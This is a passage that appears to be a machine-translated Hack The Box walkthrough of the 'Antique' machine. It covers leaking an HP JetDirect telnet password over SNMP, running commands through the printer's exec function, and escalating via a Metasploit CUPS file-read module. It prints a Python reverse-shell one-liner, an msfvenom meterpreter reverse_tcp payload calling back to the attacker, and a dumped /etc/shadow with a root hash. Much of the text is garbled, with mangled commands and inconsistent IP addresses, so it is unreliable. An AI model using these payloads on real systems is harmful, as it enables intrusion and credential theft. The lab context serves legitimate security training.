disclaimer
The hosts infiltrated in this article are legally authorized. The tools and methods used in this article are only for learning and communication. Please do not use the tools and infiltration ideas used in this article for any illegal purposes. I am not responsible for any consequences arising therefrom, nor for any misuse or damage caused.
Service to detect
Chrysene ─(root💀kali)-[~/ HTB /Antique] ├ ─# nmap-sv-pn 10.10.11.88 Host discovery disabled (-pn). All addresses will be Marked 'up' and scan times will be slower. Starting Nmap 7.91 (https://nmap.org) at 2021-11-30 07:44 EST Nmap scan Report for 10.10.11.107 Host is up (0.39s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 23/tcp open telnet? 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF - Port23 - TCP: V = I = D = 11 7% / 30% 7.91% Time = P = x86_64 a61cdf % 61 - PC - Linux - gnu % r (NUL SF:L,F,"\nHP\x20JetDirect\n\n")%r(GenericLines,19,"\nHP\x20JetDirect\n\nPa SF: ssword: \ x20 ") % r (tn3270, 19, "\ nHP \ x20JetDirect \ n \ nPassword: \ x20") % r (GetRe SF:quest,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(HTTPOptions,19,"\nHP\x SF:20JetDirect\n\nPassword:\x20")%r(RTSPRequest,19,"\nHP\x20JetDirect\n\nP SF:assword:\x20")%r(RPCCheck,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(DN SF:SVersionBindReqTCP,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(DNSStatus SF:RequestTCP,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(Help,19,"\nHP\x20 SF:JetDirect\n\nPassword:\x20")%r(SSLSessionReq,19,"\nHP\x20JetDirect\n\nP SF:assword:\x20")%r(TerminalServerCookie,19,"\nHP\x20JetDirect\n\nPassword SF::\x20")%r(TLSSessionReq,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(Kerb SF:eros,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(SMBProgNeg,19,"\nHP\x20 SF:JetDirect\n\nPassword:\x20")%r(X11Probe,19,"\nHP\x20JetDirect\n\nPasswo SF:rd:\x20")%r(FourOhFourRequest,19,"\nHP\x20JetDirect\n\nPassword:\x20")% SF:r(LPDString,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(LDAPSearchReq,19 SF:,"\nHP\x20JetDirect\n\nPassword:\x20")%r(LDAPBindReq,19,"\nHP\x20JetDir SF:ect\n\nPassword:\x20")%r(SIPOptions,19,"\nHP\x20JetDirect\n\nPassword:\ SF:x20")%r(LANDesk-RC,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(TerminalS SF:erver,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(NCP,19,"\nHP\x20JetDir SF:ect\n\nPassword:\x20")%r(NotesRPC,19,"\nHP\x20JetDirect\n\nPassword:\x2 SF:0")%r(JavaRMI,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(WMSRequest,19, SF:"\nHP\x20JetDirect\n\nPassword:\x20")%r(oracle-tns,19,"\nHP\x20JetDirec SF:t\n\nPassword:\x20")%r(ms-sql-s,19,"\nHP\x20JetDirect\n\nPassword:\x20" SF:)%r(afp,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(giop,19,"\nHP\x20Jet SF:Direct\n\nPassword:\x20"); Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 Host up) Scanned in 229.74 secondsCopy the code
Port 23 opened a Telnet service, nc connected to see
Chrysene ─(root💀kali)-[~/ HTB /Antique] ├ ─# nc 10.10.11.88 8 HP JetDirect ls Password: 123456 Invalid PasswordCopy the code
The greeting was HP JetDirect, which I checked was an HP printer
You need a password to log in to Telnet, but you don’t need an account
Find this article on Google according to HP JetDirect Telnet as the keyword
Using the method of Getting a JetDirect Password Remotely using the SNMP vulnerability, we enter the following information
─ ─ (root 💀 kali) - ~ / HTB/Antique └ ─ # snmpget - 1 - c v public 10.10.11.107. 1.3.6.1.4.1.11.2.3.9.1.1.13.0 Created directory: / var/lib/SNMP/cert_indexes iso 3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 1 39 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135Copy the code
Take the number above to the Hex2text website and the password is P@ssw0rd@123!! 123
Use the above credentials to log in to the Telnet account
Chrysene ─(root💀kali)-[~/ HTB /Antique] ├ ─# nc 10.10.11.88 88 HP JetDirect Password: P@ssw0rd@123!! 123 Please type "?" for HELP > ? To Change/Configure Parameters Enter: Parameter-name: value <Carriage Return> Parameter-name Type of value ip: IP-address in dotted notation subnet-mask: address in dotted notation (enter 0 for default) default-gw: address in dotted notation (enter 0 for default) syslog-svr: address in dotted notation (enter 0 for default) idle-timeout: seconds in integers set-cmnty-name: alpha-numeric string (32 chars max) host-name: alpha-numeric string (upper case only, 32 chars max) dhcp-config: 0 to disable, 1 to enable allow: <ip> [mask] (0 to clear, list to display, 10 max) addrawport: <TCP port num> (<TCP port num> 3000-9000) deleterawport: <TCP port num> listrawport: (No parameter required) exec: execute system commands (exec id) exit: quit from telnet session > exec id uid=7(lp) gid=7(lp) groups=7(lp),19(lpadmin) > exec whoami lp /var/spool/lpd > exec find / -name user.txt /home/lp/user.txt /var/spool/lpd/user.txtCopy the code
Right to mention
View system information
Exec uname -a Linux antique 5.13.0-051300-generic #202106272333 SMP Sun Jun 27 23:36:43 UTC 2021 x86_64 x86_64 x86_64 x86_64 GNU/Linux > exec PYTHon3 --version Python 3.8.10Copy the code
If python3 is installed, use the following command to bounce a handy shell
exec python3 -c ‘import socket,os,pty; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); S.c onnect ((” 10.10.14.15 “, 4242)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); pty.spawn(“/bin/sh”)’
Chrysene ─(root💀kali)-[~/ HTB /Antique] ├ ─# nc-lnVP 762 1 ⨯ listening on [any] 762... Connect to [10.10.14.15] from (UNKNOWN) [10.10.11.107] 41100 $ID ID UID =7(lp) GID =7(LP) groups=7(LP),19(lpadmin) $Copy the code
We found that the user group lpadmin is suspicious and may be used to raise rights. After googling, I found this article
It says:
members of lpadmin can read every file on server via cups
The user group, who can access any file in the system, searched for escalation scripts. Finally, an MSF module multi/ ESCALATE /cups_root_file_read could be used for escalation
Let’s compile an MSF rebound shell
Msfvenom -p Linux/x86 / meterpreter/reverse_tcp LHOST = 10.10.14.15 LPORT = 4444 – f the elf > shell. The elf
Transmit to target, trigger, take MSF, execute the lift script
Msf6 exploit(multi/handler) > Run [*] Started reverse TCP handler on 10.10.14.15:4444 [*] Sending stage (980808 bytes) To 10.10.11.107 [*] Meterpreter Session 2 Opened (10.10.14.15:4444 -> 10.10.11.107:52856) at 2021-11-30 11:46:50-0500 meterpreter > run multi/escalate/cups_root_file_read [!] SESSION may not be compatible with this module. [+] User in lpadmin group, continuing... [+] cupsctl binary found in $PATH [+] nc binary found in $PATH [*] found CUPS 1.6.1 [+] File /etc/shadow (998 bytes) Saved to/root /. Msf4 / loot / 20211130114734 _default_10 10.11.107 _cups_file_read_957992. Bin [*] Cleaning up... meterpreter > getuidCopy the code
Check the /etc/shadow file
┌ ─ ─ (root 💀 kali) - ~ / HTB/Antique └ ─ # cat/root /. Msf4 / loot / 20211130114734 _default_10 10.11.107 _cups_file_read_957992. Bin root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:18760:0: 99999:7::: daemon:*:18375:0:99999:7::: bin:*:18375:0:99999:7::: sys:*:18375:0:99999:7::: sync:*:18375:0:99999:7::: games:*:18375:0:99999:7::: man:*:18375:0:99999:7::: lp:*:18375:0:99999:7::: mail:*:18375:0:99999:7::: news:*:18375:0:99999:7::: uucp:*:18375:0:99999:7::: proxy:*:18375:0:99999:7::: www-data:*:18375:0:99999:7::: backup:*:18375:0:99999:7::: list:*:18375:0:99999:7::: irc:*:18375:0:99999:7::: gnats:*:18375:0:99999:7::: nobody:*:18375:0:99999:7::: systemd-network:*:18375:0:99999:7::: systemd-resolve:*:18375:0:99999:7::: systemd-timesync:*:18375:0:99999:7::: messagebus:*:18375:0:99999:7::: syslog:*:18375:0:99999:7::: _apt:*:18375:0:99999:7::: tss:*:18375:0:99999:7::: uuidd:*:18375:0:99999:7::: tcpdump:*:18375:0:99999:7::: landscape:*:18375:0:99999:7::: pollinate:*:18375:0:99999:7::: systemd-coredump:!! :18389:::::: lxd:! :18389:::::: usbmux:*:18891:0:99999:7:::Copy the code
Edit it into a format that John can read
┌ ─ ─ (root 💀 kali) - ~ / HTB/Antique └ ─ # cat shadow. TXT root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:18760:0: 99999:7: : : ┌ ─ ─ (root 💀 kali) - ~ / HTB/Antique └ ─ # unshadow passwd. TXT shadow. TXT > unshadowed. TXT ┌ ─ ─ (root 💀 kali) - ~ / HTB/Antique └ ─ # cat unshadowed.txt root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:0:0:root :/root:/bin/bashCopy the code
But I can’t blast the code
Root: id_rsa file to edit MSF module
msf6 > use multi/escalate/cups_root_file_read
msf6 post(multi/escalate/cups_root_file_read) > edit
Copy the code
Change line 46 to /root/.ssh/id_rsa
Editors save
Download to local
meterpreter > run multi/escalate/cups_root_file_read [!] SESSION may not be compatible with this module. [+] User in lpadmin group, continuing... Cupsctl binary found in $PATH [+] NC binary found in $PATH [*] found CUPS 1.6.1 [+] File /root/.ssh/id_rsa (341 Bytes) is saved to/root /. Msf4 / loot / 20211130120322 _default_10 10.11.107 _cups_file_read_145418. Bin [*] Cleaning up...Copy the code
However, without this file:
┌ ─ ─ (root 💀 kali) - [~] └ ─ # cat/root /. Msf4 / loot / 20211130120601 _default_10 10.11.107 _cups_file_read_604992. Bin <! PUBLIC DOCTYPE HTML "- / / / / W3C DTD HTML 4.01 Transitional / / EN" "http://www.w3.org/TR/html4/loose.dtd" > < HTML > < HEAD > < META HTTP-EQUIV="Content-Type" CONTENT="text/html; Charset = UTF-8 "> <TITLE>Not Found - CUPS v1.6.1</TITLE> <LINK REL="STYLESHEET" TYPE="text/ CSS "HREF="/cups.css"> </HEAD> <BODY> <H1>Not Found</H1> <P></P> </BODY> </HTML>Copy the code
Finally, we had to download /root/root.txt to the local, and finished it at 1:00 in the morning, which was the end of the penetration
meterpreter > run multi/escalate/cups_root_file_read [!] SESSION may not be compatible with this module. [+] User in lpadmin group, continuing... [+] cupsctl binary found in $PATH [+] nc binary found in $PATH [*] found CUPS 1.6.1 [+] File /root/root.txt (32 bytes) Saved to/root /. Msf4 / loot / 20211130120724 _default_10 10.11.107 _cups_file_read_556098. TXT [*] Cleaning up...Copy the code